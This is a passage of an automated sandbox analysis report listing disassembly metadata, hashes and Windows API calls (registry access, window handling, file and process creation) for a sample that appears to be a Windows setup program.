                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$EnableEnabledVisible
                                                          • String ID:
                                                          • API String ID: 3234591441-0
                                                          • Opcode ID: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                          • Instruction ID: 168d1bb9c0e6e8839a01a9d99d3d7c452caa6e9a1b9b90f31caf5ae3eef8e520
                                                          • Opcode Fuzzy Hash: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                          • Instruction Fuzzy Hash: 75E06D75100300AAE701AB2BDCC1B5B7ADCAB54350F02843FA9489B292D63ADC408B3C
                                                          APIs
                                                          • SetActiveWindow.USER32(?), ref: 00469E55
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ActiveWindow
                                                          • String ID: PrepareToInstall
                                                          • API String ID: 2558294473-1101760603
                                                          • Opcode ID: 81b39a8fdeb0dad2a777ccf23e1b5cc1b94ea3789fac9a2a9b8faf6000b70bf0
                                                          • Instruction ID: e2c6ec18e62d86bdb0c44b4d883dda39cec9e825136043f452d3b1ffdd24169b
                                                          • Opcode Fuzzy Hash: 81b39a8fdeb0dad2a777ccf23e1b5cc1b94ea3789fac9a2a9b8faf6000b70bf0
                                                          • Instruction Fuzzy Hash: 32A12C34A00105DFCB00EF9AD986EDEB7F5EF48304F5580B6E404AB362D778AE459B99
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: /:*?"<>|
                                                          • API String ID: 0-4078764451
                                                          • Opcode ID: 6835233e7ea63174332d10e4dcc06dbd64aaa3a2a45f414fb28228d8854cf9c9
                                                          • Instruction ID: b0c2865fc5a4d1d7a494ca3edaa4dc5a45f3ff44e2e280cd3bc35834766e41d0
                                                          • Opcode Fuzzy Hash: 6835233e7ea63174332d10e4dcc06dbd64aaa3a2a45f414fb28228d8854cf9c9
                                                          • Instruction Fuzzy Hash: 1671D770B002546AEB20EB66DCC2BEE77A19F44704F50C067F580AB391E779AD85875F
                                                          APIs
                                                          • SetActiveWindow.USER32(?), ref: 00481C3A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ActiveWindow
                                                          • String ID: InitializeWizard
                                                          • API String ID: 2558294473-2356795471
                                                          • Opcode ID: fdb67a5f3bc31efd8c5029728f1dc86113fdadd76a2f434d4b50cbf8c80ff7a4
                                                          • Instruction ID: 5241d356f86f5b5e3f0808c496da9b9c49bd8f9ac143394a12901a1e43732a0a
                                                          • Opcode Fuzzy Hash: fdb67a5f3bc31efd8c5029728f1dc86113fdadd76a2f434d4b50cbf8c80ff7a4
                                                          • Instruction Fuzzy Hash: 411182342452009FD700EBA9ED96B693BE8EB65318F10043BE5018B2A1DA396C01CB2D
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047BFEA,00000000,0047C124), ref: 0047BDE9
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047BDB9
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion
                                                          • API String ID: 47109696-1019749484
                                                          • Opcode ID: f9eb47421012cec5c34730d2a4c0e30c6d7bbbf73eea55f5f75bb62311f339ce
                                                          • Instruction ID: 054ff1380bf98a065617cb750ccb895fcb12562a11c78c2a0c7ed737f373e9e0
                                                          • Opcode Fuzzy Hash: f9eb47421012cec5c34730d2a4c0e30c6d7bbbf73eea55f5f75bb62311f339ce
                                                          • Instruction Fuzzy Hash: F2F082317045186BDA10A65F9C42BEBA69DCB84758F20403BF508DB343DAB99E0242EC
                                                          APIs
                                                          • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F352,?,?,00000000,0046F516,?,_is1,?), ref: 0046ECE7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID: NoModify
                                                          • API String ID: 3702945584-1699962838
                                                          • Opcode ID: 7eb4ab459c3921dc5338c7b3abf7fd5903c54a3e898984c04107b97a88657072
                                                          • Instruction ID: 1140eb4c3ce40d11de990e217cdc8ecc45d3a806a677c2547659d4957ea667b8
                                                          • Opcode Fuzzy Hash: 7eb4ab459c3921dc5338c7b3abf7fd5903c54a3e898984c04107b97a88657072
                                                          • Instruction Fuzzy Hash: C6E04FB4640308BFEB04DB55DD4AF6AB7ECDB48724F104059BA049B280E674FE00C669
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          Strings
                                                          • System\CurrentControlSet\Control\Windows, xrefs: 0042DE2E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID: System\CurrentControlSet\Control\Windows
                                                          • API String ID: 71445658-1109719901
                                                          • Opcode ID: 3bdcab3ffa95dd7854a6d474c2ff8c4d7b332cac827883cc7250e5693ef667ec
                                                          • Instruction ID: d7cc6eff87d81a3ef1983a0911a62a1ada5c46f4ff843c2b0821017aeb54f6c2
                                                          • Opcode Fuzzy Hash: 3bdcab3ffa95dd7854a6d474c2ff8c4d7b332cac827883cc7250e5693ef667ec
                                                          • Instruction Fuzzy Hash: 88D0C972910228BBEB00DE89DC41DFB77ADDB19760F45802AFD04AB241C6B4EC519BF8
                                                          APIs
                                                          • GetACP.KERNEL32(?,?,00000001,00000000,0047DD9B,?,-0000001A,0047FC14,-00000010,?,00000004,0000001B,00000000,0047FF61,?,0045D988), ref: 0047DB32
                                                            • Part of subcall function 0042E314: 73A1A570.USER32(00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7), ref: 0042E323
                                                            • Part of subcall function 0042E314: EnumFontsA.GDI32(?,00000000,0042E300,00000000,00000000,0042E36C,?,00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000), ref: 0042E34E
                                                            • Part of subcall function 0042E314: 73A1A480.USER32(00000000,?,0042E373,00000000,00000000,0042E36C,?,00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000), ref: 0042E366
                                                          • SendNotifyMessageA.USER32(00020416,00000496,00002711,-00000001), ref: 0047DD02
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: A480A570EnumFontsMessageNotifySend
                                                          • String ID:
                                                          • API String ID: 2685184028-0
                                                          • Opcode ID: 1699f4068c0c5867e7106ba40e3d9973070bda02754bb9a23a09a502d1616ce7
                                                          • Instruction ID: 990e0cae6f69a79882f0940071147895bcf3dc4f71101f62f717fb2ce75f629c
                                                          • Opcode Fuzzy Hash: 1699f4068c0c5867e7106ba40e3d9973070bda02754bb9a23a09a502d1616ce7
                                                          • Instruction Fuzzy Hash: FD517074A101008BCB21EF26E98169637B9EF94308B50C57BA8499F367C778ED46CB9D
                                                          APIs
                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFCE,?,?,00000008,00000000,00000000,0042DFFB), ref: 0042DF64
                                                          • RegCloseKey.ADVAPI32(?,0042DFD5,?,00000000,00000000,00000000,00000000,00000000,0042DFCE,?,?,00000008,00000000,00000000,0042DFFB), ref: 0042DFC8
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseEnum
                                                          • String ID:
                                                          • API String ID: 2818636725-0
                                                          • Opcode ID: 9f8261b046af4c0305013da9979aadb613cc1e3f6400fb4ebe2b883e54c4606e
                                                          • Instruction ID: c872a63f9528d4f9380aaceb5e2d891e8c563da0940016be03c3acb485ce214c
                                                          • Opcode Fuzzy Hash: 9f8261b046af4c0305013da9979aadb613cc1e3f6400fb4ebe2b883e54c4606e
                                                          • Instruction Fuzzy Hash: A8319370F04258AEDB11DFA6DD42BBFBBB9EB49304F92447BE401E6281D6385E01CA1D
                                                          APIs
                                                          • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458098,00000000,00458080,?,?,?,00000000,00452836,?,?,?,00000001), ref: 00452810
                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,00458098,00000000,00458080,?,?,?,00000000,00452836,?,?,?,00000001), ref: 00452818
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 2919029540-0
                                                          • Opcode ID: e0555b4cbc397befea5ce91cbbea4dedbfe526bfc705885143054cd240055755
                                                          • Instruction ID: e9b66965f7ed38539142cc2995e542ed63b4c0771d7d6ba66a5e4ac3981b0267
                                                          • Opcode Fuzzy Hash: e0555b4cbc397befea5ce91cbbea4dedbfe526bfc705885143054cd240055755
                                                          • Instruction Fuzzy Hash: 70113C72604608AF8B50DEADDD41D9FB7ECEB4D310B114567FD18D3241D674AD148BA8
                                                          APIs
                                                          • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFDA
                                                          • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B137,00000000,0040B14F,?,?,?,00000000), ref: 0040AFEB
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindFree
                                                          • String ID:
                                                          • API String ID: 4097029671-0
                                                          • Opcode ID: bd4d08f36a9d4a560adef0fa1bde098128f2b715f965cb3459cef9598ac6c158
                                                          • Instruction ID: aeeba5ce467f8effdb78304bcd792b874f75604bed8582862ca5d9c37e282381
                                                          • Opcode Fuzzy Hash: bd4d08f36a9d4a560adef0fa1bde098128f2b715f965cb3459cef9598ac6c158
                                                          • Instruction Fuzzy Hash: CE01DF71700700AFDB14EF65AC92A1B77ADDB4A714B11807AF400AB3D1DA39AC019AA9
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                          • 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: A25940CurrentThread
                                                          • String ID:
                                                          • API String ID: 2655091166-0
                                                          • Opcode ID: b000ad2c2d45302efb537f6ed51b85bb3a5cc49cf8a353236d3522148df1097f
                                                          • Instruction ID: ec06e6b8def62778297c6a117e91140491810bf1675edd7fb5fc45fb14f34894
                                                          • Opcode Fuzzy Hash: b000ad2c2d45302efb537f6ed51b85bb3a5cc49cf8a353236d3522148df1097f
                                                          • Instruction Fuzzy Hash: D9015B76A04604BFD706CF6BDC1199ABBE8E789720B22887BEC04D3690E6355810DF18
                                                          APIs
                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00452C96
                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00452CBC), ref: 00452C9E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastMove
                                                          • String ID:
                                                          • API String ID: 55378915-0
                                                          • Opcode ID: 4b3f53bb71bbb3de239a758d95ad3dd7b2750d400091be83cb52db7a615a65e0
                                                          • Instruction ID: 72322736c602c8c7a1920fbe291f5aeb87443d44c1116871956ce6e3077d7411
                                                          • Opcode Fuzzy Hash: 4b3f53bb71bbb3de239a758d95ad3dd7b2750d400091be83cb52db7a615a65e0
                                                          • Instruction Fuzzy Hash: C9012671B00604AB8B01EB799D4189EB7ECDB4A32575045BBFC14E3343EA784E04456C
                                                          APIs
                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527A3), ref: 0045277D
                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,004527A3), ref: 00452785
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 9ee879c615aac4fee22e4c99406f95e71c245cbd6d77cc6155be40721354894d
                                                          • Instruction ID: e798b8fcaf2c893210dd6dd972d3083c0fc79cae1e6532b7171fe4e83a13409b
                                                          • Opcode Fuzzy Hash: 9ee879c615aac4fee22e4c99406f95e71c245cbd6d77cc6155be40721354894d
                                                          • Instruction Fuzzy Hash: E1F02871A04604BFCB00EF759E4159EB3E8DB0E721B1045B7FC04E3242E7B94E048598
                                                          APIs
                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00423241
                                                          • LoadCursorA.USER32(00000000,00000000), ref: 0042326B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CursorLoad
                                                          • String ID:
                                                          • API String ID: 3238433803-0
                                                          • Opcode ID: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                          • Instruction ID: 59516fef74be350ba7f17c0e511b54e8d6c2303d910d3728eb6a55db14448276
                                                          • Opcode Fuzzy Hash: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                          • Instruction Fuzzy Hash: 68F0271170421066D6109E3E6CC0A6B72A8DF82335B71037BFB3EC72D1CA2E1D414569
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                          • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLibraryLoadMode
                                                          • String ID:
                                                          • API String ID: 2987862817-0
                                                          • Opcode ID: 5e1e313bdd13d7489a01f7e50f084508f9c5c97fde52d832d9963c9b8019f2bb
                                                          • Instruction ID: aa33dc687cd71512c069df69893670fc4fcbad3b08ca7d4395289e8ee6212cdb
                                                          • Opcode Fuzzy Hash: 5e1e313bdd13d7489a01f7e50f084508f9c5c97fde52d832d9963c9b8019f2bb
                                                          • Instruction Fuzzy Hash: 13F08270714B44BFDB019F779CA282BBBECEB49B1179249B6FD00A3691E53C5910C928
                                                          APIs
                                                          • GetClassInfoA.USER32(00400000,?,?), ref: 004162D9
                                                          • GetClassInfoA.USER32(00000000,?,?), ref: 004162E9
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ClassInfo
                                                          • String ID:
                                                          • API String ID: 3534257612-0
                                                          • Opcode ID: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                          • Instruction ID: 6cd5cb93a67b39dfae17eda9b7884797c0ece5161c54fd1178b0752c2523ee83
                                                          • Opcode Fuzzy Hash: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                          • Instruction Fuzzy Hash: C7E01AB26015146EE710DFA89D81EE73BDCDB08350B2201B7FE08CB246D3A4DD008BA8
                                                          APIs
                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046FF69,?,00000000), ref: 004508E2
                                                          • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046FF69,?,00000000), ref: 004508EA
                                                            • Part of subcall function 00450688: GetLastError.KERNEL32(004504A4,0045074A,?,00000000,?,00497338,00000001,00000000,00000002,00000000,00497499,?,?,00000005,00000000,004974CD), ref: 0045068B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$FilePointer
                                                          • String ID:
                                                          • API String ID: 1156039329-0
